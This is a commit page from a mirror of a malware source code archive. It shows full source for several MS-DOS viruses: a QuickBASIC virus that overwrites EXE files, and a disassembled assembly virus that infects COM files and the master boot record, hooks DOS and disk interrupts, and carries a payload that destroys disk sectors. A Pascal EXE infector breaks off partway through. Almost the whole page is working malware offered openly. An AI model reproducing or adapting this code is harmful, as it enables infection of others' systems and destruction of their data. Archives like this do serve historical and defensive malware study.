daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 23:39:23 +00:00
Code Issues Projects Releases Wiki Activity

re-organize

Browse Source 
push
This commit is contained in:
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Q-Index/Virus.MSDOS.Unknown.qb.bas
+73
View File
@@ -0,0 +1,73 @@
A QB Virus
Tis virus simply overwrites all the EXE's in the current DIR using DOS, it also uses a small assembly routine to "find itself" you must use QB 4.5 to compile it then after you compile (be sure to load QB with the /l switch) just run it, you may try using PKLITE on it and recording the new file size then changing the 43676 to whatever the new size is....
DEFINT A-Z
'$INCLUDE: 'qb.bi'
DECLARE FUNCTION ProgramName$ ()
SHELL "DIR /b *.exeé¨é"
OPEN "é¨é" FOR BINARY AS #1
IF LOF(1) = 0 THEN CLOSE : KILL "é¨é": GOTO endit
CLOSE
OPEN "é¨é" FOR INPUT AS #1
1 LINE INPUT #1, host$
GOSUB infect
endit:
crdate$ = "ÎËÓÏÍ"
FOR i = 1 TO LEN(crdate$)
cdate$ = cdate$ + CHR$(ASC(MID$(crdate$, i, 1)) XOR &HFE)
NEXT
IF MID$(DATE$, 1, 5) = cdate$ THEN GOSUB message
PRINT "Program to big to fit in memory"
END
infect:
OPEN host$ FOR BINARY AS #2
IF LOF(2) < 1200 OR LOF(2) = 43676 OR LOF(2) = 0 THEN CLOSE : GOTO 1
CLOSE
doit$ = "copy " + ProgramName$ + " " + host$ + "nul"
SHELL doit$
CLOSE : GOSUB endit
END
message:
CLS
FOR i = 1 TO 25 * 19.2
PRINT "&deg;&plusmn;&sup2;Û";
COLOR RND * 14 + 1
NEXT
DO: LOOP UNTIL INKEY$ < ""
CLS
PRINT
msg$ = "öîßÌËÙÔääð...î"œ""šïÔ-ùÈÎÅÃÂýÅØÃÆ&sect;"
FOR i = 1 TO 37
PRINT CHR$(ASC(MID$(msg$, i, 1)) XOR &HAD);
NEXT
FUNCTION ProgramName$ STATIC
DIM Regs AS RegType 'Allocate space for TYPE
' RegType
Regs.ax = &H5100 'DOS function 51h
Interrupt &H21, Regs, Regs ' Get PSP Address
DEF SEG = Regs.bx 'Regs.bx returns PSP sgmnt.
EnvSeg% = PEEK(&H2C) + PEEK(&H2D) * 256 'Get environment address
DEF SEG = EnvSeg% 'Set environment address
DO
Byte% = PEEK(Offset%) 'Take a byte
IF Byte% = 0 THEN 'Items are ASCIIZ
Count% = Count% + 1 ' terminated
IF Count% AND EXEFlag% THEN 'EXE also ASCIIZ terminated
EXIT DO 'Exit at the end
ELSEIF Count% = 2 THEN 'Last entry in env. is
EXEFlag% = -1 ' terminated with two
Offset% = Offset% + 2 ' NULs. Two bytes ahead
END IF ' is the EXE file name.
ELSE 'If Byte% < 0, reset
Count% = 0 ' zero counter
IF EXEFlag% THEN 'If EXE name found,
Temp$ = Temp$ + CHR$(Byte%) ' build string
END IF
END IF
Offset% = Offset% + 1 'To grab next byte...
LOOP 'Do it again
DEF SEG 'Reset default segment
ProgramName$ = Temp$ 'Return value
Temp$ = "" 'Clean up
END FUNCTION
MSDOS/Q-Index/Virus.MSDOS.Unknown.qmu.asm
+685
View File
@@ -0,0 +1,685 @@
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
start: jmp l_0CBD ;0100 E9 0BBA
d_0103 db 'J' ;0103 4A
;=============================================================
; Victim code here
;-------------------------------------------------------------
org 076Bh
;=============================================================
; begin of virus code
;-------------------------------------------------------------
;-------BOF pattern (jump into virus & contamination ptr)
db 0E9h ;076B E9
d_0101 dw 0682Ah ;jump distance ;076C 2A 68
db 'J' ;076E 4A
;=============================================================
; Partition table buffer (content not constant)
;-------------------------------------------------------------
r_0104: jmp short l_0775 ;076F EB 04
db 90h ;0771 90
db 'QQ' ;0772 51 51
db 64h ;0774 64
l_0775: push cs ;0775 0E
pop ax ;0776 58
cmp ax,0 ;0777 3D 0000
je l_077F ;077A 74 03
jmp short l_07D2 ;077C EB 54
db 90h ;077E 90
l_077F: cmp byte ptr cs:[7C05h],0 ;077F 2E: 80 3E 7C05 00
jne l_0799 ;0785 75 12
l_0787: mov ax,310h ;0787 B8 0310
mov cx,1 ;078A B9 0001
mov dx,80h ;078D BA 0080
mov bx,0 ;0790 .BB 0000
int 13h ;0793 CD 13
stc ;0795 F9
cli ;0796 FA
jc l_0787 ;0797 72 EE
l_0799: xor ax,ax ;0799 33 C0
mov es,ax ;079B 8E C0
dec byte ptr cs:[7C05h] ;079D 2E: FE 0E 7C05
mov ax,301h ;07A2 B8 0301
mov cx,1 ;07A5 B9 0001
mov dx,80h ;07A8 BA 0080
mov bx,7C00h ;07AB .BB 7C00
int 13h ;07AE CD 13
mov ax,1000h ;07B0 B8 1000
mov es,ax ;07B3 8E C0
mov ax,0 ;07B5 B8 0000
mov ds,ax ;07B8 8E D8
mov di,7C00h ;07BA .BF 7C00
mov si,di ;07BD 8B F7
cld ;07BF FC
mov cx,200h ;07C0 B9 0200
rep movsb ;07C3 F3/ A4
mov ax,1000h ;07C5 B8 1000
push ax ;07C8 50
mov ax,7C00h ;07C9 B8 7C00
push ax ;07CC 50
mov bp,sp ;07CD 8B EC
;* jmp dword ptr [bp] ;07CF FF 6E 00
db 0FFh, 6Eh, 00h ;07CF FF 6E 00
l_07D2: xor ax,ax ;07D2 33 C0
mov ds,ax ;07D4 8E D8
mov ax,27Bh ;07D6 B8 027B
mov ds:[0413h],ax ;07D9 A3 0413
mov ax,9F00h ;07DC B8 9F00
mov es,ax ;07DF 8E C0
mov bx,0100h ;07E1 .BB 0100
mov al,8 ;07E4 B0 08
mov ah,2 ;07E6 B4 02
mov ch,0 ;07E8 B5 00
mov cl,3 ;07EA B1 03
mov dh,0 ;07EC B6 00
mov dl,80h ;07EE B2 80
int 13h ;07F0 CD 13
xor ax,ax ;07F2 33 C0
mov ds,ax ;07F4 8E D8
mov word ptr ds:[03D4h],'JM' ;07F6 C7 06 03D4 4A4D
mov ax,48Bh ;07FC B8 048B
mov ds:[0070h],ax ;07FF A3 0070
mov word ptr ds:[0072h],9F00h ;0802 C7 06 0072 9F00
mov ax,0 ;0808 B8 0000
mov es,ax ;080B 8E C0
mov bx,7C00h ;080D .BB 7C00
mov ah,2 ;0810 B4 02
mov al,1 ;0812 B0 01
mov ch,0 ;0814 B5 00
mov cl,2 ;0816 B1 02
mov dh,0 ;0818 B6 00
mov dl,80h ;081A B2 80
int 13h ;081C CD 13
xor ax,ax ;081E 33 C0
push ax ;0820 50
mov ax,7C00h ;0821 B8 7C00
push ax ;0824 50
mov bp,sp ;0825 8B EC
;* jmp dword ptr [bp] ;*1 entry ;0827 FF 6E 00
db 0FFh, 6Eh, 00h ;0827 FF 6E 00
db '. fixed disk.', 0Dh, 0Ah, 0Dh, 0Ah ;082A 2E 20 66 69 78 65
;0830 64 20 64 69 73 6B
;0836 2E 0D 0A 0D 0A
db 'Insert COMPAQ DOS diskette in dr' ;083B 49 6E 73 65 72 74
;0841 20 43 4F 4D 50 41
;0847 51 20 44 4F 53 20
;084D 64 69 73 6B 65 74
;0853 74 65 20 69 6E 20
;0859 64 72
db 'ive A.', 0Dh, 0Ah, 'Press any ke' ;085B 69 76 65 20 41 2E
;0861 0D 0A 50 72 65 73
;0867 73 20 61 6E 79 20
;086D 6B 65
db 'y when ready: ' ;086F 79 20 77 68 65 6E
;0875 20 72 65 61 64 79
;087B 3A 20
db 7 ;087D 07
db 207 dup (0) ;087E 00CF[00]
db 80h, 01h, 01h, 00h, 04h, 06h ;094D 80 01 01 00 04 06
db 51h, 6Dh, 11h, 00h, 00h, 00h ;0953 51 6D 11 00 00 00
db 11h,0AAh, 00h, 00h, 00h, 00h ;0959 11 AA 00 00 00 00
db 41h, 6Eh, 04h, 06h, 91h,0DBh ;095F 41 6E 04 06 91 DB
db 22h,0AAh, 00h, 00h, 22h,0AAh ;0965 22 AA 00 00 22 AA
db 00h, 00h, 55h,0AAh ;096B 00 00 55 AA
;----------------------------------------------------------------
; partition table buffer end
;----------------------------------------------------------------
r_0304 dw 1460h ;int 21h offset ;096F 60 14
r_0306 dw 0273h ;int 21h segment ;0971 73 02
r_0308 dw 1DADh ;int 13h offset ;0973 AD 1D
r_030A dw 0070h ;int 13h segment ;0973 70 00
db 2Bh ;0977 2B
r_030D db 1 ;desturction active if=0;0978 01
r_030E dw 0 ;:= 0C8h - to activation;0979 00 00
r_0310 db 0E9h,34h,05h,01h ;victim bytes ;097B E9 34 05 01
r_0314 db 'Bad command or file name',0Dh,0Ah,'$' ;097F 42 61 64 20 63 6F
;0985 6D 6D 61 6E 64 20
;098B 6F 72 20 66 69 6C
;0991 65 20 6E 61 6D 65
;0997 0D 0A 24
d_032F dw 5 ;file handle ;099A 05 00
d_0331 dw 066Bh ;healthy file length ;099C 6B 06
;===============================================================
; Is virus resident ?
;---------------------------------------------------------------
s_099E proc near
push ax ;099E 50
push ds ;099F 1E
xor ax,ax ;09A0 33 C0
mov ds,ax ;09A2 8E D8
cmp word ptr ds:[03D4h],'JM' ;int F5h ;09A4 81 3E 03D4 4A4D
je l_09B0 ;09AA 74 04
clc ;<- NOT resident ;09AC F8
jmp short l_09B1 ;09AD EB 02
db 90h ;09AF 90
l_09B0: stc ;<- YES, resident ;09B0 F9
l_09B1: pop ds ;09B1 1F
pop ax ;09B2 58
retn ;09B3 C3
s_099E endp
;===============================================================
; Set infection flag
;---------------------------------------------------------------
s_09B4 proc near
push ax ;09B4 50
push ds ;09B5 1E
xor ax,ax ;09B6 33 C0
mov ds,ax ;09B8 8E D8
mov word ptr ds:[03D4h],'JM' ;09BA C7 06 03D4 4A4D
pop ds ;09C0 1F
pop ax ;09C1 58
retn ;09C2 C3
s_09B4 endp
;===============================================================
; Contamine first hard disk drive
;---------------------------------------------------------------
s_09C3 proc near
push ds ;09C3 1E
push es ;09C4 06
push cs ;09C5 0E
pop ds ;09C6 1F
mov ah,2 ;read ;09C7 B4 02
mov al,1 ;1 sector ;09C9 B0 01
mov ch,0 ;track 0 ;09CB B5 00
mov cl,1 ;sector 1 ;09CD B1 01
mov dh,0 ;head 0 ;09CF B6 00
mov dl,80h ;first hard disk drive ;09D1 B2 80
push cs ;09D3 0E
pop es ;09D4 07
mov bx,0104h ;= l_076F ;09D5 .BB 0104
int 13h ;09D8 CD 13
cmp cs:[0107h],'QQ' ;contamination signature;09DA 2E: 81 3E 0107 5151
je l_0A38 ;-> allready infected ;09E1 74 55
;<- destruction variable initiation
mov word ptr cs:[30Eh],0C8h ;= l_0979 count ;09E3 2E: C7 06 030E 00C8
mov byte ptr cs:[30Dh],1 ;= l_0978 off ;09EA 2E: C6 06 030D 01
mov byte ptr cs:[3D5h],64h ;= l_0A40 count ;09F0 2E: C6 06 03D5 64
;<- save oryginal
mov ah,3 ;write ;09F6 B4 03
mov al,1 ;1 sector ;09F8 B0 01
mov ch,0 ;track 0 ;09FA B5 00
mov cl,2 ;sector 2 ;09FC B1 02
mov dh,0 ;head 0 ;09FE B6 00
mov dl,80h ;1 HD Drive ;0A00 B2 80
mov bx,104h ;= offset l_076F ;0A02 .BB 0104
int 13h ;0A05 CD 13
;<- make new Master Boot Record
mov cx,0BBh ;constant part length ;0A07 B9 00BB
inc cx ;0A0A 41
mov si,3D0h ;= offset l_0A3B ;0A0B .BE 03D0
mov di,104h ;= offset l_076F ;0A0E .BF 0104
cld ;0A11 FC
rep movsb ;0A12 F3/ A4
mov ah,3 ;write ;0A14 B4 03
mov al,1 ;1 sector ;0A16 B0 01
mov ch,0 ;track 0 ;0A18 B5 00
mov cl,1 ;sector 1 ;0A1A B1 01
mov dh,0 ;head 0 ;0A1C B6 00
mov dl,80h ;1-st HD Drive ;0A1E B2 80
mov bx,0104h ;= offset L_076F ;0A20 .BB 0104
int 13h ;0A23 CD 13
;<- write rest of virus code
mov al,8 ;8 sectors ;0A25 B0 08
mov ah,3 ;write ;0A27 B4 03
mov ch,0 ;track 0 ;0A29 B5 00
mov cl,3 ;sector 3 ;0A2B B1 03
mov dh,0 ;head 0 ;0A2D B6 00
mov dl,80h ;1-st HD Drive ;0A2F B2 80
mov bx,100h ;= offset L076B ;0A31 .BB 0100
push cs ;0A34 0E
pop es ;0A35 07
int 13h ;0A36 CD 13
;<-- partition table allready infected
l_0A38: pop es ;0A38 07
pop ds ;0A39 1F
retn ;0A3A C3
s_09C3 endp
;================================================================
; Master Boot Record code pattern
;----------------------------------------------------------------
jmp short l_0A41 ;0A3B EB 04
nop ;0A3D 90
db 'QQ' ;contamination sygnature;0A3E 51 51
r_03D5 db 64h ;reboot count to destr. ;0A40 64
l_0A41: push cs ;0A41 0E
pop ax ;0A42 58
cmp ax,0 ;0A43 3D 0000
je l_0A4B ;0A46 74 03
jmp short l_0A9E ;0A48 EB 54
nop ;0A4A 90
;<- code to make destruction
l_0A4B: cmp byte ptr cs:[7C05h],0 ;= r_0305 ;0A4B 2E: 80 3E 7C05 00
jne l_0A65 ;-> counter not exhaused;0A51 75 12
l_0A53: mov ax,0310h ;write 16 sectors ;0A53 B8 0310
mov cx,1 ;track 0, sector 0 ;0A56 B9 0001
mov dx,80h ;head 0, HDD 0 ;0A59 BA 0080
mov bx,0 ;buffer ;0A5C .BB 0000
int 13h ;0A5F CD 13
stc ;0A61 F9
cli ;0A62 FA
jc l_0A53 ;endless loop ;0A63 72 EE
l_0A65: xor ax,ax ;0A65 33 C0
mov es,ax ;0A67 8E C0
dec byte ptr cs:[7C05h] ;reboot counter ;0A69 2E: FE 0E 7C05
mov ax,301h ;write counter to disk ;0A6E B8 0301
mov cx,1 ;0A71 B9 0001
mov dx,80h ;0A74 BA 0080
mov bx,7C00h ;0A77 .BB 7C00
int 13h ;0A7A CD 13
mov ax,1000h ;make virus boot copy ;0A7C B8 1000
mov es,ax ;0A7F 8E C0
mov ax,0 ;0A81 B8 0000
mov ds,ax ;0A84 8E D8
mov di,7C00h ;0A86 .BF 7C00
mov si,di ;0A89 8B F7
cld ;0A8B FC
mov cx,200h ;0A8C B9 0200
rep movsb ;0A8F F3/ A4
mov ax,1000h ;0A91 B8 1000
push ax ;0A94 50
mov ax,7C00h ;0A95 B8 7C00
push ax ;0A98 50
mov bp,sp ;0A99 8B EC
jmp dword ptr [bp] ;run boot code again ;0A9B FF 6E 00
l_0A9E: xor ax,ax ;0A9E 33 C0
mov ds,ax ;0AA0 8E D8
mov ax,27Bh ;= 635 ;0AA2 B8 027B
mov ds:[0413h],ax ;BIOS memory size ;0AA5 A3 0413
mov ax,9F00h ;0AA8 B8 9F00
mov es,ax ;0AAB 8E C0
mov bx,0100h ;virus offset ;0AAD .BB 0100
mov al,8 ;8 sectors ;0AB0 B0 08
mov ah,2 ;read ;0AB2 B4 02
mov ch,0 ;track ;0AB4 B5 00
mov cl,3 ;sector ;0AB6 B1 03
mov dh,0 ;head ;0AB8 B6 00
mov dl,80h ;hdd nr 0 ;0ABA B2 80
int 13h ;0ABC CD 13
xor ax,ax ;0ABE 33 C0
mov ds,ax ;0AC0 8E D8
mov word ptr ds:[03D4h],'JM' ;virus sign. ;0AC2 C7 06 03D4 4A4D
mov ax,48Bh ;0AC8 B8 048B
mov ds:[0070h],ax ;int 1Ch offs ;0ACB A3 0070
mov word ptr ds:[0072h],9F00h;int 1Ch seg ;0ACE C7 06 0072 9F00
mov ax,0 ;0AD4 B8 0000
mov es,ax ;0AD7 8E C0
mov bx,7C00h ;oryg.boot buffer ;0AD9 .BB 7C00
mov ah,2 ;read ;0ADC B4 02
mov al,1 ;1 sector ;0ADE B0 01
mov ch,0 ;track=0 ;0AE0 B5 00
mov cl,2 ;oryg. boot sector = 2 ;0AE2 B1 02
mov dh,0 ;head ;0AE4 B6 00
mov dl,80h ;drive ;0AE6 B2 80
int 13h ;0AE8 CD 13
xor ax,ax ;0AEA 33 C0
push ax ;0AEC 50
mov ax,7C00h ;0AED B8 7C00
push ax ;0AF0 50
mov bp,sp ;0AF1 8B EC
jmp dword ptr [bp] ;0AF3 FF 6E 00
;-------End of MBR pattern
;================================================================
; int 1Ch handling routine (wait until DOS establishing vectors)
;----------------------------------------------------------------
cmp word ptr cs:[30Eh],0 ;0AF6 2E: 83 3E 030E 00
jne l_0AFF ;0AFC 75 01
iret ;0AFE CF
l_0AFF: push ax ;0AFF 50
push ds ;0B00 1E
xor ax,ax ;0B01 33 C0
mov ds,ax ;0B03 8E D8
mov word ptr ds:[03D4h],'JM' ;0B05 C7 06 03D4 4A4D
dec word ptr cs:[30Eh] ;0B0B 2E: FF 0E 030E
cmp word ptr cs:[30Eh],0 ;counter to dest;0B10 2E: 83 3E 030E 00
jne l_0B54 ;0B16 75 3C
cli ;0B18 FA
mov byte ptr cs:[30Dh],0 ;destruct.active;0B19 2E: C6 06 030D 00
xor ax,ax ;0B1F 33 C0
mov ds,ax ;0B21 8E D8
mov ax,ds:[084h] ;int 21h offset ;0B23 A1 0084
mov word ptr cs:[304h],ax ;0B26 2E: A3 0304
mov ax,ds:[086h] ;int 21h segment;0B2A A1 0086
mov word ptr cs:[306h],ax ;0B2D 2E: A3 0306
mov ax,ds:[04Ch] ;int 13h offset ;0B31 A1 004C
mov word ptr cs:[308h],ax ;0B34 2E: A3 0308
mov ax,ds:[04Eh] ;int 13h segment;0B38 A1 004E
mov word ptr cs:[30Ah],ax ;0B3B 2E: A3 030A
;<- int 21h
mov word ptr ds:[084h],51Bh ;L_0B86 = offset;0B3F C7 06 0084 051B
mov ds:[086h],cs ; segment;0B45 8C 0E 0086
;<- int 13h
mov word ptr ds:[04Ch],4ECh ;L_0B57 = offset;0B49 C7 06 004C 04EC
mov ds:[04Eh],cs ; segment;0B4F 8C 0E 004E
sti ;0B53 FB
l_0B54: pop ds ;0B54 1F
pop ax ;0B55 58
iret ;0B56 CF
;===============================================================
; Int 13 handling routine - sector destruction
;---------------------------------------------------------------
CMP BYTE PTR cs:[030Dh],1 ;disable ? ;0B57 2E803E0D0301
JZ l_0B81 ;-> yes ;0B5D 7422
CMP AH,2 ;0B5F 80FC02
JNZ l_0B81 ;0B62 751D
INC BYTE PTR cs:[030Ch] ;interval 256 ;0B64 2EFE060C03
CMP BYTE PTR cs:[030Ch],00 ;0B69 2E803E0C0300
JNZ l_0B81 ;->still waiting;0B6F 7510
PUSHF ;0B71 9C
CALL dword ptr cs:[0308h] ;int 13h;0B72 2EFF1E0803
MOV WORD PTR es:[BX+00C8h],'jm' ;destr. ;0B77 26C787C8006D6A
RETF 2 ;0B7E CA0200
l_0B81: JMP dword ptr cs:[0308h] ;int 13h;0B81 2EFF2E0803
;===============================================================
; Int 21h service routine
;---------------------------------------------------------------
r_051B: CMP AX,4B00h ;0B86 3D004B
JZ l_0B8E ;0B89 7403
JMP l_0C5F ;-> oryginal service ;0B8B E9D100
;<- run program, contamine before
l_0B8E: push ax ;0B8E 50
push bx ;0B8F 53
push cx ;0B90 51
push dx ;0B91 52
push bp ;0B92 55
push di ;0B93 57
push si ;0B94 56
push ds ;0B95 1E
push es ;0B96 06
call s_0C64 ;check type of victim ;0B97 E8 00CA
jnc l_0B9F ;-> COM ;0B9A 73 03
jmp l_0C50 ;-> not COM ;0B9C E9 00B1
l_0B9F: mov ax,4301h ;set file attribute ;0B9F B8 4301
mov cx,0 ;no atributtes ;0BA2 B9 0000
int 21h ;0BA5 CD 21
mov byte ptr cs:[30Dh],1 ;no destruction ;0BA7 2E: C6 06 030D 01
mov ah,3Dh ;open file ;0BAD B4 3D
mov al,2 ;read/write ;0BAF B0 02
int 21h ;0BB1 CD 21
jnc l_0BB8 ;-> O.K. ;0BB3 73 03
jmp l_0C50 ;-> error, exit ;0BB5 E9 0098
l_0BB8: mov word ptr cs:[32Fh],ax ;file handle ;0BB8 2E: A3 032F
call s_0C7F ;check if file infected ;0BBC E8 00C0
jnc l_0BC4 ;-> no ;0BBF 73 03
jmp l_0C47 ;-> yes ;0BC1 E9 0083
l_0BC4: xor cx,cx ;offset := 0 ;0BC4 33 C9
mov dx,cx ;0BC6 8B D1
mov ax,4200h ;move file ptr BOF+offs ;0BC8 B8 4200
mov bx,word ptr cs:[32Fh] ;file handle ;0BCB 2E: 8B 1E 032F
int 21h ;0BD0 CD 21
mov cx,4 ;4 bytes ;0BD2 B9 0004
mov bx,word ptr cs:[32Fh] ;file handle ;0BD5 2E: 8B 1E 032F
mov dx,310h ;L097B = safes ;0BDA .BA 0310
mov ah,3Fh ;read file ;0BDD B4 3F
push cs ;0BDF 0E
pop ds ;0BE0 1F
int 21h ;0BE1 CD 21
jnc l_0BE8 ;-> O.K. ;0BE3 73 03
jmp short l_0C47 ;-> ERROR ;0BE5 EB 60
nop ;0BE7 90
l_0BE8: mov ax,4202h ;file ptr EOF+of;0BE8 B8 4202
mov bx,word ptr cs:[32Fh] ;file handle ;0BEB 2E: 8B 1E 032F
xor cx,cx ;offset=0 ;0BF0 33 C9
xor dx,dx ;0BF2 33 D2
int 21h ;0BF4 CD 21
mov word ptr cs:[331h],ax ;L099C = file l.;0BF6 2E: A3 0331
cmp dx,0 ;high order word;0BFA 83 FA 00
je l_0C02 ;-> LT 64K bytes;0BFD 74 03
jmp short l_0C47 ;-> file too big;0BFF EB 46
nop ;0C01 90
l_0C02: and ah,7Fh ;??? ;0C02 80 E4 7F
cmp ax,32h ;minimum file size ;0C05 3D 0032
jg l_0C0D ;-> O.K. ;0C08 7F 03
jmp short l_0C47 ;-> too small ;0C0A EB 3B
nop ;0C0C 90
l_0C0D: mov ah,40h ;file write ;0C0D B4 40
mov bx,word ptr cs:[32Fh] ;file handle ;0C0F 2E: 8B 1E 032F
mov cx,5E9h ;virus length ;0C14 B9 05E9
push cs ;0C17 0E
pop ds ;virus segment ;0C18 1F
mov dx,100h ;virus offset ;0C19 .BA 0100
int 21h ;0C1C CD 21
mov ax,word ptr cs:[331h] ;file length ;0C1E 2E: A1 0331
add ax,54Fh ;(+3 = L0CBD) ;0C22 05 054F
mov word ptr cs:[101h],ax ;0C25 2E: A3 0101
xor cx,cx ;offset := 0 ;0C29 33 C9
xor dx,dx ;0C2B 33 D2
mov al,0 ;BOF + offset ;0C2D B0 00
mov ah,42h ;set file ptr ;0C2F B4 42
mov bx,word ptr cs:[32Fh] ;file handle ;0C31 2E: 8B 1E 032F
int 21h ;0C36 CD 21
mov cx,4 ;4 bytes ;0C38 B9 0004
mov ah,40h ;write file ;0C3B B4 40
mov bx,word ptr cs:[32Fh] ;file handle ;0C3D 2E: 8B 1E 032F
mov dx,100h ;virus start cod;0C42 .BA 0100
int 21h ;0C45 CD 21
;<- Contamination error entry
l_0C47: mov bx,word ptr cs:[32Fh] ;file handle ;0C47 2E: 8B 1E 032F
mov ah,3Eh ;close file ;0C4C B4 3E
int 21h ;0C4E CD 21
;<-- file not infectable or end of infection
l_0C50: mov byte ptr cs:[30Dh],0 ;enable destruct;0C50 2E: C6 06 030D 00
pop es ;0C56 07
pop ds ;0C57 1F
pop si ;0C58 5E
pop di ;0C59 5F
pop bp ;0C5A 5D
pop dx ;0C5B 5A
pop cx ;0C5C 59
pop bx ;0C5D 5B
pop ax ;0C5E 58
l_0C5F: jmp dword ptr cs:[304h] ;oryg. int 21h ;0C5F 2E: FF 2E 0304
;=======================================================
; Subroutine - check type of victim
;-------------------------------------------------------
s_0C64 proc near
push ax ;0C64 50
push bx ;0C65 53
mov bx,dx ;victim name offset ;0C66 8B DA
mov al,0 ;End of path char ;0C68 B0 00
l_0C6A: inc bx ;0C6A 43
cmp [bx],al ;0C6B 38 07
jne l_0C6A ;0C6D 75 FB
mov ax,4D4Fh ;'MO'- last COM letters ;0C6F B8 4D4F
cmp [bx-2],ax ;0C72 39 47 FE
je l_0C7B ;-> it's COM ;0C75 74 04
stc ;'not infectable' - ptr ;0C77 F9
jmp short l_0C7C ;0C78 EB 02
db 90h ;0C7A 90
l_0C7B: clc ;'infectable' - ptr ;0C7B F8
l_0C7C: pop bx ;0C7C 5B
pop ax ;0C7D 58
retn ;0C7E C3
s_0C64 endp
;=======================================================
; Subroutine - check if file infected
;-------------------------------------------------------
s_0C7F proc near
jmp short l_0C83 ;0C7F EB 02
nop ;0C81 90
d_0C82 db 1 ;1 char file buffer ;0C82 01
l_0C83: push ax ;0C83 50
push bx ;0C84 53
push cx ;0C85 51
push dx ;0C86 52
push es ;0C87 06
push ds ;0C88 1E
push cs ;0C89 0E
pop ds ;0C8A 1F
mov ax,4200h ;move file ptr BOF+offs ;0C8B B8 4200
mov bx,word ptr cs:[32Fh] ;file handle ;0C8E 2E: 8B 1E 032F
xor cx,cx ;0C93 33 C9
mov dx,3 ;0:3 ;0C95 BA 0003
int 21h ;0C98 CD 21
mov ah,3Fh ;read ;0C9A B4 3F
mov cx,1 ;1 byte ;0C9C B9 0001
mov bx,word ptr cs:[32Fh] ;file handle ;0C9F 2E: 8B 1E 032F
mov dx,0617h ;L_0C82 =file buffer ;0CA4 .BA 0617
int 21h ;0CA7 CD 21
cmp byte ptr cs:[617h],'J' ;infection ptr ;0CA9 2E: 80 3E 0617 4A
je l_0CB5 ;-> allready infected ;0CAF 74 04
clc ;0CB1 F8
jmp short l_0CB6 ;-> ready to infection ;0CB2 EB 02
nop ;0CB4 90
l_0CB5: stc ;<- infected ;0CB5 F9
l_0CB6: pop es ;0CB6 07
pop ds ;0CB7 1F
pop dx ;0CB8 5A
pop cx ;0CB9 59
pop bx ;0CBA 5B
pop ax ;0CBB 58
retn ;0CBC C3
s_0C7F endp
;=======================================================
; virus entry point
;-------------------------------------------------------
l_0CBD: call s_099E ;Is virus resident ? ;0CBD E8 FCDE
jnc l_0CE0 ;-> no ;0CC0 73 1E
;<- run victim
mov cx,4 ;changed bytes count ;0CC2 B9 0004
cld ;0CC5 FC
mov di,100h ;address ;0CC6 .BF 0100
call s_0CCC ;0CC9 E8 0000
;------ restore victim byte
s_0CCC proc near
pop bp ;0CCC 5D
sub bp,661h ;l_066B=virus begin-100h;0CCD 81 ED 0661
lea si,[bp+310h] ;l_097B ;0CD1 8D B6 0310
cld ;0CD5 FC
rep movsb ;0CD6 F3/ A4
push cs ;0CD8 0E
mov ax,offset start ;0CD9 .B8 0100
push ax ;0CDC 50
retn 0FFFEh ;0CDD C2 FFFE
s_0CCC endp
;<- virus not resident yet
l_0CE0: call s_0CE3 ;0CE0 E8 0000
;------ make virus resident
s_0CE3 proc near
pop bp ;0CE3 5D
sub bp,678h ;=066Bh = vir_beg-100h ;0CE4 81 ED 0678
push cs ;0CE8 0E
pop ds ;0CE9 1F
push cs ;0CEA 0E
pop es ;0CEB 07
mov di,100h ;0CEC .BF 0100
lea si,[bp+100h] ;virus code begin ;0CEF 8D B6 0100
cld ;0CF3 FC
mov cx,5E9h ;virus length ;0CF4 B9 05E9
rep movsb ;overwrite victim code ;0CF7 F3/ A4
mov ax,0693h ;= l_0CFB ;0CF9 .B8 0693
push ax ;0CFC 50
retn ;0CFD C3
s_0CE3 endp
;---------------------------------------------------------------
; Run in new place
;---------------------------------------------------------------
r_0693: MOV DX,0314h ;=l_097F (Bad command..);0CFE BA1403
MOV AH,9 ;display string ;0D01 B409
INT 21h ;0D03 CD21
PUSH CS ;0D05 0E
POP DS ;0D06 1F
MOV AX,3521h ;get int 21h ;0D07 B82135
INT 21h ;0D0A CD21
MOV cs:[0304h],BX ;= l_096F ;0D0C 2E891E0403
MOV cs:[0306h],ES ;= l_0971 ;0D11 2E8C060603
CLI ;0D16 FA
XOR AX,AX ;0D17 33C0
MOV DS,AX ;0D19 8ED8
MOV ds:[86h],CS ;int 21h segment ;0D1B 8C0E8600
MOV AX,051Bh ;= l_0B86 ;0D1F B81B05
MOV ds:[84h],AX ;int 21h offset ;0D22 A38400
STI ;0D25 FB
CALL s_09B4 ;Set infection flag ;0D26 E88BFC
CALL s_09C3 ;contamine hard disk ;0D29 E897FC
PUSH CS ;0D2C 0E
POP DS ;0D2D 1F
MOV AX,3513h ;get int 13h vector ;0D2E B81335
INT 21h ;0D31 CD21
MOV cs:[0308h],BX ;= l_0973 ;0D33 2E891E0803
MOV cs:[030Ah],ES ;= l_0975 ;0D38 2E8C060A03
MOV DX,04ECh ;= l_0B57 ;0D3D BAEC04
MOV AX,2513h ;set int 13h vector ;0D40 B81325
INT 21h ;0D43 CD21
MOV DX,06E9h ;= l_0D54 ;0D45 BAE906
MOV CL,4 ;0D48 B104
SHR DX,CL ;0D4A D3EA
ADD DX,11h ;+256bytes (+alignement);0D4C 83C211
MOV AX,3100h ;Terminate&Stay Resident;0D4F B80031
INT 21h ;0D52 CD21
seg_a ends
end start

MSDOS/Q-Index/Virus.MSDOS.Unknown.queen.pas
+161
View File
@@ -0,0 +1,161 @@
(*
Virus on Pascal.
____________________________________________________________________
This is a nontsr virus that infects *.exe files and codes the saved-
part of the file,so it can be hardly cured!
To compile,you'll need TurboPascal(I'm using v.7) and CRT.TPU and
DOS.TPU libreries!
____________________________________________________________________
(c) 1997 by Master of Infection
-------------------------------------------
*)
{$M $1024,0,0} {Get some Memory!}
uses dos,crt; {Using libraries}
const id='Queen'; {Just my FAVORITE BAND ;-) }
long=7504; {Viri's length}
mark=$5B7; {Where Queen is in Viri}
var mybuf,exebuf:array [1..long] of char; {Arrays to use}
f,ff,fff,p:file; {File handles}
s,ss,sss:searchrec; {Searchrecords}
bufm1:array [1..5] of char; {Yes,One more array}
i:word; {And al the rest Variabels...}
time,time1,time2:longint;
attr,attr1,attr2:byte;
q:string;
y,j:integer;
ee,cmdline:string;
coder,decoder:byte;
(*
You could use one proprocedure,but I'v simply desided
to practice in Typing :-)
*)
procedure decode;
begin
